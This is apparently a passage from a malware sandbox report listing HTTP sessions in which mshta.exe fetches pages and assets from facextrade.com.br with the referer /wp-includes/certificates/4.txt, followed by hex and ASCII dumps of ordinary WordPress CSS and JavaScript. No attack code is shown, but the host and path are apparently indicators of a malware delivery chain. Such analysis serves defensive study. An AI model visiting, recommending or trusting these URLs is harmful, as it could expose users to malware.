                                        Data Ascii: cextrade.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.20"}};!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p
                                        Aug 16, 2022 10:48:45.524914026 CEST496INData Raw: 70 70 6f 72 74 73 2e 66 6c 61 67 2c 74 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65
                                        Data Ascii: pports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload
                                        Aug 16, 2022 10:48:45.524930954 CEST498INData Raw: 31 30 31 64 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61
                                        Data Ascii: 101d<style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em
                                        Aug 16, 2022 10:48:45.524946928 CEST499INData Raw: 74 2d 61 77 65 73 6f 6d 65 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d
                                        Data Ascii: t-awesome.css?ver=3.2.1' type='text/css' media='all' /><link rel='stylesheet' id='cherry-plugin-css' href='http://facextrade.com.br/wp-content/plugins/cherry-plugin/includes/css/cherry-plugin.css?ver=1.2.8.1' type='text/css' media='all' /><
                                        Aug 16, 2022 10:48:45.525573969 CEST501INData Raw: 73 73 3f 76 65 72 3d 31 2e 30 2e 30 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 67 78 2d 6c 6f 67 6f 2d 73
                                        Data Ascii: ss?ver=1.0.0' type='text/css' media='all' /><link rel='stylesheet' id='lgx-logo-slider-animate-css' href='http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20' type='text/css' media='al
                                        Aug 16, 2022 10:48:45.525588036 CEST501INData Raw: 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 43 68 65 72 72 79 46 72 61 6d 65 77 6f 72 6b 2f 6a 73 2f 6a 71 75 65 72 79
                                        Data Ascii: ascript' src='http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2'></script>
                                        Aug 16, 2022 10:48:45.533633947 CEST502INData Raw: 31 30 37 66 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67
                                        Data Ascii: 107f<script type='text/javascript' src='http://facextrade.com.br/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1.3.js?ver=1.3'></script><script type='text/javascript' src='http://facextrade.com.br/wp-content/plugins/cherry-plugin/li
                                        Aug 16, 2022 10:48:45.533674002 CEST503INData Raw: 2f 6a 73 2f 6c 6f 67 6f 2d 73 6c 69 64 65 72 2d 77 70 2d 70 75 62 6c 69 63 2e 6a 73 3f 76 65 72 3d 31 2e 30 2e 30 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73
                                        Data Ascii: /js/logo-slider-wp-public.js?ver=1.0.0'></script><script type='text/javascript' src='http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1'></script><script type='text/javascript' src='http://fac
                                        Aug 16, 2022 10:48:45.740700006 CEST505INData Raw: 4c 20 3d 27 68 74 74 70 3a 2f 2f 66 61 63 65 78 74 72 61 64 65 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 35 31 32 35 33 27 2c 0a 09 20 50 41 52 45 4e 54 5f 55 52 4c 20 3d 20 27 68 74 74 70 3a 2f
                                        Data Ascii: L ='http://facextrade.com.br/wp-content/themes/theme51253', PARENT_URL = 'http://facextrade.com.br/wp-content/themes/CherryFramework', CURRENT_THEME = 'theme51253'</script><style type='text/css'>body { background-image:url(http://facext


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        13192.168.2.2249188187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:46.261348963 CEST525OUTGET /wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.default.min.css?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:46.494805098 CEST527INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:46 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 10 Aug 2021 23:54:27 GMT
                                        ETag: "a51451-3f5-5c93d38d94a1b"
                                        Accept-Ranges: bytes
                                        Content-Length: 1013
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 2f 2a 2a 0a 20 2a 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 76 32 2e 33 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2d 32 30 31 38 20 44 61 76 69 64 20 44 65 75 74 73 63 68 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 3a 20 53 45 45 20 4c 49 43 45 4e 53 45 20 49 4e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 0a 20 2a 2f 0a 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 64 6f 74 73 2c 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 6e 61 76 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 6e 61 76 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 6e 61 76 20 5b 63 6c 61 73 73 2a 3d 6f 77 6c 2d 5d 7b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 72 67 69 6e 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 37 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 44 36 44 36 44 36 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 7d 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 6e 61 76 20 5b 63 6c 61 73 73 2a 3d 6f 77 6c 2d 5d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 38 36 39 37 39 31 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 6e 61 76 20 2e 64 69 73 61 62 6c 65 64 7b 6f 70 61 63 69 74 79 3a 2e 35 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 6e 61 76 2e 64 69 73 61 62 6c 65 64 2b 2e 6f 77 6c 2d 64 6f 74 73 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 64 6f 74 73 20 2e 6f 77 6c 2d 64 6f 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 7a 6f 6f 6d 3a 31 7d 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 64 6f 74 73 20 2e 6f 77 6c 2d 64 6f 74 20 73 70 61 6e 7b 77 69 64 74 68 3a 31 30 70 78 3b 68 65 69 67 68 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 3a 35 70 78 20 37 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 44 36 44 36 44 36 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 32 73 20 65 61 73 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 30 70 78 7d 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 64 6f 74 73 20 2e 6f 77 6c 2d 64 6f 74 2e 61 63 74 69 76 65 20 73 70 61 6e 2c 2e 6f 77 6c 2d 74 68 65 6d 65 20 2e 6f 77 6c 2d 64 6f 74 73 20 2e 6f 77 6c 2d 64 6f 74 3a 68 6f 76 65 72 20 73 70 61 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 38 36 39 37 39 31 7d
                                        Data Ascii: /** * Owl Carousel v2.3.4 * Copyright 2013-2018 David Deutsch * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE */.owl-theme .owl-dots,.owl-theme .owl-nav{text-align:center;-webkit-tap-highlight-color:transparent}.owl-theme .owl-nav{margin-top:10px}.owl-theme .owl-nav [class*=owl-]{color:#FFF;font-size:14px;margin:5px;padding:4px 7px;background:#D6D6D6;display:inline-block;cursor:pointer;border-radius:3px}.owl-theme .owl-nav [class*=owl-]:hover{background:#869791;color:#FFF;text-decoration:none}.owl-theme .owl-nav .disabled{opacity:.5;cursor:default}.owl-theme .owl-nav.disabled+.owl-dots{margin-top:10px}.owl-theme .owl-dots .owl-dot{display:inline-block;zoom:1}.owl-theme .owl-dots .owl-dot span{width:10px;height:10px;margin:5px 7px;background:#D6D6D6;display:block;-webkit-backface-visibility:visible;transition:opacity .2s ease;border-radius:30px}.owl-theme .owl-dots .owl-dot.active span,.owl-theme .owl-dots .owl-dot:hover span{background:#869791}


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        14192.168.2.2249189187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:46.313534975 CEST526OUTGET /wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel.min.css?ver=1.0.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:46.552010059 CEST529INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:46 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 10 Aug 2021 23:54:27 GMT
                                        ETag: "a51456-d17-5c93d38d9645e"
                                        Accept-Ranges: bytes
                                        Content-Length: 3351
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 2f 2a 2a 0a 20 2a 20 4f 77 6c 20 43 61 72 6f 75 73 65 6c 20 76 32 2e 33 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2d 32 30 31 38 20 44 61 76 69 64 20 44 65 75 74 73 63 68 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 3a 20 53 45 45 20 4c 49 43 45 4e 53 45 20 49 4e 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 4f 77 6c 43 61 72 6f 75 73 65 6c 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 0a 20 2a 2f 0a 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 2c 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 7b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 31 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 73 74 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 2d 6d 73 2d 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 70 61 6e 2d 59 3b 74 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 3b 2d 6d 6f 7a 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 73 74 61 67 65 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 2e 22 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 68 65 69 67 68 74 3a 30 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 73 74 61 67 65 2d 6f 75 74 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 2c 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 77 72 61 70 70 65 72 7b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 2d 6d 6f 7a 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 2d 6d 73 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 66 61 63 65 2d 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75 74 3a 6e 6f 6e 65 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 20 69 6d 67 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 64 6f 74 73 2e 64 69 73 61 62 6c 65 64 2c 2e 6f
                                        Data Ascii: /** * Owl Carousel v2.3.4 * Copyright 2013-2018 David Deutsch * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE */.owl-carousel,.owl-carousel .owl-item{-webkit-tap-highlight-color:transparent;position:relative}.owl-carousel{display:none;width:100%;z-index:1}.owl-carousel .owl-stage{position:relative;-ms-touch-action:pan-Y;touch-action:manipulation;-moz-backface-visibility:hidden}.owl-carousel .owl-stage:after{content:".";display:block;clear:both;visibility:hidden;line-height:0;height:0}.owl-carousel .owl-stage-outer{position:relative;overflow:hidden;-webkit-transform:translate3d(0,0,0)}.owl-carousel .owl-item,.owl-carousel .owl-wrapper{-webkit-backface-visibility:hidden;-moz-backface-visibility:hidden;-ms-backface-visibility:hidden;-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0)}.owl-carousel .owl-item{min-height:1px;float:left;-webkit-backface-visibility:hidden;-webkit-touch-callout:none}.owl-carousel .owl-item img{display:block;width:100%}.owl-carousel .owl-dots.disabled,.o
                                        Aug 16, 2022 10:48:46.552057981 CEST530INData Raw: 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 6e 61 76 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 6e 6f 2d 6a 73 20 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 2c 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 2e 6f 77 6c 2d
                                        Data Ascii: wl-carousel .owl-nav.disabled{display:none}.no-js .owl-carousel,.owl-carousel.owl-loaded{display:block}.owl-carousel .owl-dot,.owl-carousel .owl-nav .owl-next,.owl-carousel .owl-nav .owl-prev{cursor:pointer;-webkit-user-select:none;-khtml-user
                                        Aug 16, 2022 10:48:46.552095890 CEST531INData Raw: 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 20 2e 6f 77 6c 2d 6c 61 7a 79 5b 73 72 63 5e 3d 22 22 5d 7b 6d 61 78 2d 68 65 69 67 68 74 3a 30 7d 2e 6f 77 6c 2d 63 61 72 6f 75 73 65 6c 20 2e 6f 77 6c 2d 69 74 65 6d 20 69 6d 67 2e 6f 77
                                        Data Ascii: -carousel .owl-item .owl-lazy[src^=""]{max-height:0}.owl-carousel .owl-item img.owl-lazy{transform-style:preserve-3d}.owl-carousel .owl-video-wrapper{position:relative;height:100%;background:#000}.owl-carousel .owl-video-play-icon{position:abs


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        15192.168.2.2249190187.45.240.6980C:\Windows\System32\mshta.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 16, 2022 10:48:46.966279030 CEST532OUTGET /wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.css?ver=20 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:47.205826044 CEST534INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:47 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 10 Aug 2021 23:54:27 GMT
                                        ETag: "a51464-13cec-5c93d38d9adcd"
                                        Accept-Ranges: bytes
                                        Content-Length: 81132
                                        Connection: close
                                        Content-Type: text/css
                                        Data Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0d 0a 0d 0a 2f 2a 21 0d 0a 41 6e 69 6d 61 74 65 2e 63 73 73 20 2d 20 68 74 74 70 3a 2f 2f 64 61 6e 65 64 65 6e 2e 6d 65 2f 61 6e 69 6d 61 74 65 0d 0a 56 65 72 73 69 6f 6e 20 2d 20 33 2e 34 2e 30 0d 0a 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 0d 0a 0d 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 20 44 61 6e 69 65 6c 20 45 64 65 6e 0d 0a 2a 2f 0d 0a 0d 0a 2e 61 6e 69 6d 61 74 65 64 20 7b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0d 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0d 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0d 0a 7d 0d 0a 0d 0a 2e 61 6e 69 6d 61 74 65 64 2e 69 6e 66 69 6e 69 74 65 20 7b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 20 69 6e 66 69 6e 69 74 65 3b 0d 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 20 69 6e 66 69 6e 69 74 65 3b 0d 0a 7d 0d 0a 0d 0a 2e 61 6e 69 6d 61 74 65 64 2e 68 69 6e 67 65 20 7b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 32 73 3b 0d 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 32 73 3b 0d 0a 7d 0d 0a 0d 0a 2e 61 6e 69 6d 61 74 65 64 2e 62 6f 75 6e 63 65 49 6e 2c 0d 0a 2e 61 6e 69 6d 61 74 65 64 2e 62 6f 75 6e 63 65 4f 75 74 20 7b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 2e 37 35 73 3b 0d 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 2e 37 35 73 3b 0d 0a 7d 0d 0a 0d 0a 2e 61 6e 69 6d 61 74 65 64 2e 66 6c 69 70 4f 75 74 58 2c 0d 0a 2e 61 6e 69 6d 61 74 65 64 2e 66 6c 69 70 4f 75 74 59 20 7b 0d 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 2e 37 35 73 3b 0d 0a 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 2e 37 35 73 3b 0d 0a 7d 0d 0a 0d 0a 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 20 7b 0d 0a 20 20 20 20 66 72 6f 6d 2c 20 32 30 25 2c 20 35 33 25 2c 20 38 30 25 2c 20 74 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 32 31 35 2c 20 30 2e 36 31 30 2c 20 30 2e 33 35 35 2c 20 31 2e 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 32 31 35 2c 20 30 2e 36 31 30 2c 20 30 2e 33 35 35 2c 20 31 2e 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33
                                        Data Ascii: @charset "UTF-8";/*!Animate.css - http://daneden.me/animateVersion - 3.4.0Licensed under the MIT license - http://opensource.org/licenses/MITCopyright (c) 2015 Daniel Eden*/.animated { -webkit-animation-duration: 1s; animation-duration: 1s; -webkit-animation-fill-mode: both; animation-fill-mode: both;}.animated.infinite { -webkit-animation-iteration-count: infinite; animation-iteration-count: infinite;}.animated.hinge { -webkit-animation-duration: 2s; animation-duration: 2s;}.animated.bounceIn,.animated.bounceOut { -webkit-animation-duration: .75s; animation-duration: .75s;}.animated.flipOutX,.animated.flipOutY { -webkit-animation-duration: .75s; animation-duration: .75s;}@-webkit-keyframes bounce { from, 20%, 53%, 80%, to { -webkit-animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); animation-timing-function: cubic-bezier(0.215, 0.610, 0.355, 1.000); -webkit-transform: translate3d(0,0,0); transform: translate3
                                        Aug 16, 2022 10:48:47.205878019 CEST536INData Raw: 64 28 30 2c 30 2c 30 29 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 34 30 25 2c 20 34 33 25 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62
